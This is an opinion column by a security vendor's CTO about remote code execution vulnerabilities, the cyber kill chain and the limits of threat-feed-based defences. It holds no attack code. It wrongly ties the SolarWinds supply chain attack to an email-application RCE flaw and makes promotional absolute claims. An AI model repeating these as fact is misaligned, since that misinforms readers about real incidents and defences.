This week CheckPoint published a new report that chronicled the regional threat landscape over the past six months. In the report, the company identified that the most common vulnerability exploit type was Remote Code Execution (RCE), which impacted 62 per cent of businesses.
This finding is not at all surprising. From an attacker’s perspective, an RCE vulnerability in a workload — a workload being the infrastructure on which data center software runs — is the gift that keeps on giving, in countless attacks, not only in the UAE but across the globe.
Metaphorically speaking, RCE vulnerabilities are like the rocket that will launch any cyberattack warhead such as the ransomware (e.g. LockBit, DarkSide, REvil, Sodinokibi, etc. etc.) warhead. Most recently, an RCE vulnerability in an email application was implicated in the highly publicized SolarWinds supply chain attack. RCE vulnerabilities were also the root cause of the Hafnium and Kaseya attacks. Very early and automated protection in response to an RCE attack is essential for effective enterprise protection.
RCE: How it Works
When a craftily constructed payload is delivered to an application with a lurking RCE vulnerability, the application relinquishes execution control to the attacker. The application is said to have reached the “Exploitation” state in the cyber kill chain. Wresting execution control from an application allows the attacker to not only install more tools required to perpetuate the attack but also establish a two-way communication path back to the attacker’s command control center.
At this point, the attacker has achieved full keyboard control on the victim. Now the victim workload is totally at the attacker’s mercy and can perform any malicious action of the attacker’s choosing. These actions could include running ransomware, exfiltrating critical data, scraping user credentials, pivoting to other workloads, perform crypto mining activities, join a botnet, etc.
Underestimating the enemy
It is often said that adversaries use the same techniques repeatedly. Assuming threat actors will leverage the same techniques continuously is not only naïve but is also a little self-serving for classes of cyber security products that leverage signatures and threat feeds. Most adversaries are well funded, skilled, motivated, and highly effective.
All they need is early awareness of an RCE vulnerability and an enterprise that is hosting the vulnerable application. Once they are in the enterprise data center, the attack metastasizes in seconds. If the attacker is able to reach the Command and Control state in the kill chain, there is going to be no stopping the adversary.
RCE Vulnerabilities are particularly potent against conventional endpoint, perimeter, and threat hunting security tools.
Even though these security tools claim they work in the application’s runtime, their runtime clock starts after the attack has reached the “Actions on Objectives” state in the kill chain; long after the attacker has achieved keyboard control over the victim workload. These security tools work by tracking how many anomalous activities have occurred over a fixed period of time.
They declare the victim is under attack if a pre-defined threshold of anomalous activities is exceeded. A skilled attacker can float under the radar and be able to totally bypass protection offered by conventional security tools. At SolarWinds, the attack continued unabated from September 2019 to Dec 2020 (15 months) before a security vendor published a specific indicator of compromise (IOC).
To achieve true protection against an attack that leverages an RCE vulnerability, the security control must kickstart protection before the attack reaches the “Command Control” stage of the kill chain. An attack that has crossed the Command Control (C2) stage of the kill chain is unstoppable. Irreparable harm is guaranteed to occur.
What the Cybersecurity Future Holds
Continued dependence on security controls that are fueled by threat feeds, even if these tools advertise cool AI/ ML capabilities, is a losing battle. Vulnerabilities will continue to proliferate, and no amount of prior knowledge or threat hunting can keep up. For every hour it takes a bad actor to create new malware, it takes many thousands of hours for cyber defenders to perform static and dynamic analysis on it to extract a foolproof IOC.
[Satya Gupta is Cofounder and Chief Technology Officer at Virsec]